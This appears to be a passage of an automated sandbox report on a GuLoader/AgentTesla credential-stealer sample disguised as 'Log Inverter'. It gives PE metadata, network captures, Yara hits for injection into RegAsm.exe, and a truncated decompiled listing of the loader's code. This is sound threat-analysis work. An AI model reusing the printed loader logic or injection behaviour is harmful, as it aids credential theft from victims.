                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x150 | .text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                Sections

                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0xe694 | 0xf000 | False | 0.390836588542 | data | 5.92866235429 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                .data | 0x10000 | 0x1218 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                .rsrc | 0x12000 | 0xc04 | 0x1000 | False | 0.265625 | data | 2.89090895296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                Resources

                Name | RVA | Size | Type | Language | Country
                RT_ICON | 0x1235c | 0x8a8 | data |  |
                RT_GROUP_ICON | 0x12348 | 0x14 | data |  |
                RT_VERSION | 0x120f0 | 0x258 | data | English | United States

                Imports

                DLL | Import
                MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaVarForInit, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, __vbaVarForNext, _CIexp, __vbaFreeStr, __vbaFreeObj

                Version Infos

                Description | Data
                Translation | 0x0409 0x04b0
                InternalName | Muligheds
                FileVersion | 1.00
                CompanyName | Log
                ProductName | Log Inverter
                ProductVersion | 1.00
                FileDescription | Log Inverter
                OriginalFilename | Muligheds.exe

                Possible Origin

                Language of compilation system | Country where language is spoken
                English | United States

                Network Behavior

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 22, 2021 14:49:16.041336060 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.041347980 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.041376114 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.041424036 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.041448116 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.043488979 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.043514967 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.043600082 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.043641090 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.045558929 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.045605898 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.045612097 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.045644999 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.047529936 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.047557116 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.047605038 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.047632933 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.049449921 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.049477100 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.049518108 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.049539089 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.051358938 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.051393032 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.051415920 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.051453114 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.053194046 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.053227901 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.053251982 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.053271055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.055051088 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.055078030 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.055124044 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.055145025 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.056837082 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.056863070 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.056904078 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.056936026 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.058650970 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.058681011 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.058712006 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.058751106 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.059794903 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.059822083 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.059863091 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.059890985 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.060920000 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.060947895 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.060983896 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.061002970 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.062037945 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.062062979 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.062119007 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.063178062 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.063203096 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.063252926 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.063287020 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.064373016 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.064399004 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.064480066 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.065416098 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.065438986 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.065474033 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.065495968 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.066457033 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.066481113 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.066601038 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.067542076 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.067567110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.067620039 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.068618059 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.068641901 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.068700075 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.069694996 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.069720984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.069767952 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.069798946 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.070733070 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.070760012 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.070787907 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.070826054 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.071733952 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.071757078 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.071796894 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.071822882 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.072741032 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.072767973 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.072814941 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.072834969 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.073745012 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.073771954 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.073812008 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.073836088 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.074733973 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.074758053 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.074810028 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.074830055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.075727940 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.075757027 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.075802088 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.075819969 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.076740026 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.076766014 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.076809883 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.076838017 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.077724934 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.077749968 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.077799082 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.077817917 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.078680992 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.078705072 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.078756094 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.078773022 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.079622984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.079649925 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.079722881 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.079737902 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.080581903 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.080605984 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.080657959 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.080673933 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.081598043 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.081619024 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.081686020 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.082488060 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.082513094 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.082580090 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.083416939 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.083441019 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.083518982 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.083538055 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.084357977 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.084382057 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.084429979 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.084448099 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.085336924 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.085361004 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.085480928 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.086251974 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.086277962 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.086323977 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.086339951 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.087156057 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.087178946 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.087249994 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088063002 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088129997 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088143110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088185072 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.088959932 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.088980913 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089036942 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.089066029 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.089867115 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089889050 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.089947939 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090087891 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090749025 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.090806961 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.090831995 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.090852976 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.091655970 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.091675043 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.091717005 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.091732979 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.092552900 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.092572927 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.092607021 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.092638016 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.093431950 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.093453884 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.093494892 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.093513966 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.094252110 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.094269037 CET44349711142.250.186.33192.168.2.3
                Feb 22, 2021 14:49:16.094314098 CET49711443192.168.2.3142.250.186.33
                Feb 22, 2021 14:49:16.094331980 CET49711443192.168.2.3142.250.186.33

                UDP Packets

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Feb 22, 2021 14:49:15.423935890 CET | 192.168.2.3 | 8.8.8.8 | 0xa15b | Standard query (0) | doc-0c-58-docs.googleusercontent.com | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Feb 22, 2021 14:49:15.490955114 CET | 8.8.8.8 | 192.168.2.3 | 0xa15b | No error (0) | doc-0c-58-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001)
                Feb 22, 2021 14:49:15.490955114 CET | 8.8.8.8 | 192.168.2.3 | 0xa15b | No error (0) | googlehosted.l.googleusercontent.com | | 142.250.186.33 | A (IP address) | IN (0x0001)

                HTTPS Packets

                Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                Feb 22, 2021 14:49:15.600152016 CET | 142.250.186.33 | 443 | 192.168.2.3 | 49711 | CN=*.googleusercontent.com, O=Google LLC, L=Mountain View, ST=California, C=US | CN=GTS CA 1O1, O=Google Trust Services, C=US | Tue Jan 26 10:05:02 CET 2021 | Tue Apr 20 11:05:01 CEST 2021 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19
                | | | | | CN=GTS CA 1O1, O=Google Trust Services, C=US | CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2 | Thu Jun 15 02:00:42 CEST 2017 | Wed Dec 15 01:00:42 CET 2021 | |

                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time: 14:48:21
                Start date: 22/02/2021
                Path: C:\Users\user\Desktop\Muligheds.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\Muligheds.exe'
                Imagebase: 0x400000
                File size: 73728 bytes
                MD5 hash: 4AA8881D2D0103703BD7301616CD8CAF
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: Visual Basic
                Reputation: low

                General

                Start time: 14:49:02
                Start date: 22/02/2021
                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Wow64 process (32bit): true
                Commandline: 'C:\Users\user\Desktop\Muligheds.exe'
                Imagebase: 0xe30000
                File size: 64616 bytes
                MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: .Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, Author: Joe Security
                Reputation: high

                General

                Start time: 14:49:03
                Start date: 22/02/2021
                Path: C:\Windows\System32\conhost.exe
                Wow64 process (32bit): false
                Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase: 0x7ff6b2800000
                File size: 625664 bytes
                MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Reputation: high

                Disassembly

                Code Analysis

                  Executed Functions

                  C-Code - Quality: 56%
                  			E0040BFCA(void* __ebx, void* __edi, void* __esi, signed int _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v40;
                  				void* _v56;
                  				void* _v72;
                  				short _v76;
                  				char _v80;
                  				long long _v88;
                  				signed int _v92;
                  				signed int _v96;
                  				char _v100;
                  				char _v104;
                  				signed int _v108;
                  				char _v112;
                  				char _v116;
                  				char _v120;
                  				intOrPtr _v128;
                  				char _v136;
                  				intOrPtr _v144;
                  				char _v152;
                  				intOrPtr _v160;
                  				char _v168;
                  				char* _v176;
                  				char _v184;
                  				intOrPtr _v192;
                  				char _v200;
                  				signed int _v208;
                  				char _v216;
                  				char _v220;
                  				char _v224;
                  				char _v228;
                  				char* _v232;
                  				char _v236;
                  				char _v240;
                  				char _v244;
                  				char _v248;
                  				intOrPtr _v252;
                  				char _v256;
                  				char _v264;
                  				signed int _v268;
                  				signed int _v272;
                  				signed int _v276;
                  				signed int _v280;
                  				intOrPtr* _v284;
                  				signed int _v288;
                  				signed int _v292;
                  				signed int _v296;
                  				signed int _v300;
                  				char _v316;
                  				char _v332;
                  				signed int _v344;
                  				signed int _v348;
                  				signed int _v352;
                  				signed int _v356;
                  				signed int _v360;
                  				intOrPtr _v364;
                  				signed int _v368;
                  				signed int _v372;
                  				signed int _v376;
                  				signed int _v380;
                  				intOrPtr* _v384;
                  				signed int _v388;
                  				signed int _v392;
                  				intOrPtr* _v396;
                  				signed int _v400;
                  				intOrPtr* _v404;
                  				signed int _v408;
                  				char _v412;
                  				signed int _v416;
                  				signed int _v420;
                  				intOrPtr* _v424;
                  				signed int _v428;
                  				intOrPtr* _v432;
                  				signed int _v436;
                  				intOrPtr* _v440;
                  				signed int _v444;
                  				intOrPtr* _v448;
                  				signed int _v452;
                  				intOrPtr* _v456;
                  				signed int _v460;
                  				signed int _v464;
                  				intOrPtr* _v468;
                  				signed int _v472;
                  				intOrPtr* _v476;
                  				signed int _v480;
                  				intOrPtr* _v484;
                  				signed int _v488;
                  				intOrPtr* _v492;
                  				signed int _v496;
                  				signed int _v500;
                  				signed int _v504;
                  				signed int _v508;
                  				intOrPtr* _v512;
                  				signed int _v516;
                  				intOrPtr* _v520;
                  				signed int _v524;
                  				intOrPtr* _v528;
                  				signed int _v532;
                  				intOrPtr* _v536;
                  				signed int _v540;
                  				intOrPtr* _v544;
                  				signed int _v548;
                  				intOrPtr* _v552;
                  				signed int _v556;
                  				intOrPtr* _v560;
                  				signed int _v564;
                  				intOrPtr* _v568;
                  				signed int _v572;
                  				signed int _v576;
                  				intOrPtr* _v580;
                  				signed int _v584;
                  				intOrPtr* _v588;
                  				signed int _v592;
                  				intOrPtr* _v596;
                  				signed int _v600;
                  				intOrPtr* _v604;
                  				signed int _v608;
                  				signed int _v612;
                  				signed int _t815;
                  				signed int _t822;
                  				signed int _t826;
                  				signed int _t830;
                  				signed int _t834;
                  				char* _t838;
                  				signed int _t842;
                  				signed int _t848;
                  				signed int _t855;
                  				signed int _t859;
                  				signed int _t863;
                  				signed int _t867;
                  				char* _t871;
                  				signed int _t875;
                  				signed int _t879;
                  				signed int _t883;
                  				signed int _t915;
                  				signed int _t919;
                  				signed int _t929;
                  				signed int _t933;
                  				signed int _t937;
                  				signed int _t941;
                  				signed int _t945;
                  				char* _t949;
                  				signed int _t953;
                  				signed int _t957;
                  				signed int _t961;
                  				char* _t963;
                  				signed int _t969;
                  				signed int _t977;
                  				char* _t983;
                  				signed int _t989;
                  				signed int _t993;
                  				signed int _t997;
                  				signed int _t1001;
                  				signed int _t1005;
                  				char* _t1009;
                  				signed int _t1013;
                  				signed int _t1017;
                  				signed int _t1021;
                  				signed int _t1046;
                  				signed int _t1050;
                  				signed int _t1054;
                  				signed int _t1058;
                  				char* _t1062;
                  				signed int _t1066;
                  				signed int _t1071;
                  				signed int _t1075;
                  				char* _t1077;
                  				signed int _t1088;
                  				signed int _t1100;
                  				signed int _t1104;
                  				signed int _t1108;
                  				signed int _t1112;
                  				char* _t1116;
                  				signed int _t1120;
                  				signed int _t1124;
                  				signed int _t1128;
                  				signed int _t1147;
                  				char* _t1150;
                  				char* _t1155;
                  				signed int _t1161;
                  				signed int _t1166;
                  				intOrPtr _t1178;
                  				intOrPtr _t1192;
                  				intOrPtr _t1196;
                  				intOrPtr _t1210;
                  				intOrPtr _t1239;
                  				intOrPtr _t1251;
                  				void* _t1285;
                  				void* _t1287;
                  				intOrPtr _t1288;
                  				long long* _t1289;
                  				void* _t1290;
                  				intOrPtr* _t1292;
                  				void* _t1293;
                  				void* _t1294;
                  				void* _t1296;
                  				long long* _t1297;
                  				intOrPtr* _t1299;
                  
                  				_t1288 = _t1287 - 0xc;
                  				 *[fs:0x0] = _t1288;
                  				L004012A0();
                  				_v16 = _t1288;
                  				_v12 = 0x4011c8;
                  				_v8 = _a4 & 0x00000001;
                  				_a4 = _a4 & 0xfffffffe;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012a6, _t1285);
                  				_v176 =  &M0040B008;
                  				_v184 = 8;
                  				L004013E4();
                  				_push( &_v136);
                  				_push( &_v152); // executed
                  				L004013EA(); // executed
                  				_v192 = 0x15;
                  				_v200 = 0x8002;
                  				_push( &_v152);
                  				_t815 =  &_v200;
                  				_push(_t815);
                  				L004013F0();
                  				_v268 = _t815;
                  				_push( &_v152);
                  				_push( &_v136);
                  				_push(2);
                  				L00401432();
                  				_t1289 = _t1288 + 0xc;
                  				if(_v268 != 0) {
                  					if( *0x4103c4 != 0) {
                  						_v384 = 0x4103c4;
                  					} else {
                  						_push(0x4103c4);
                  						_push(0x40b03c);
                  						L004013DE();
                  						_v384 = 0x4103c4;
                  					}
                  					_v268 =  *_v384;
                  					_t1161 =  *((intOrPtr*)( *_v268 + 0x1c))(_v268,  &_v104);
                  					asm("fclex");
                  					_v272 = _t1161;
                  					if(_v272 >= 0) {
                  						_v388 = _v388 & 0x00000000;
                  					} else {
                  						_push(0x1c);
                  						_push(0x40b02c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v388 = _t1161;
                  					}
                  					_v276 = _v104;
                  					_t1166 =  *((intOrPtr*)( *_v276 + 0x64))(_v276, 1,  &_v220);
                  					asm("fclex");
                  					_v280 = _t1166;
                  					if(_v280 >= 0) {
                  						_v392 = _v392 & 0x00000000;
                  					} else {
                  						_push(0x64);
                  						_push(0x40b04c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v392 = _t1166;
                  					}
                  					_v76 = _v220;
                  					L004013D2();
                  				}
                  				if( *0x410010 != 0) {
                  					_v396 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v396 = 0x410010;
                  				}
                  				_t822 =  &_v104;
                  				L004013CC();
                  				_v268 = _t822;
                  				_t826 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t822,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x2fc))( *_v396));
                  				asm("fclex");
                  				_v272 = _t826;
                  				if(_v272 >= 0) {
                  					_v400 = _v400 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b05c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v400 = _t826;
                  				}
                  				if( *0x410010 != 0) {
                  					_v404 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v404 = 0x410010;
                  				}
                  				_t830 =  &_v108;
                  				L004013CC();
                  				_v276 = _t830;
                  				_t834 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v96, _t830,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x314))( *_v404));
                  				asm("fclex");
                  				_v280 = _t834;
                  				if(_v280 >= 0) {
                  					_v408 = _v408 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b06c);
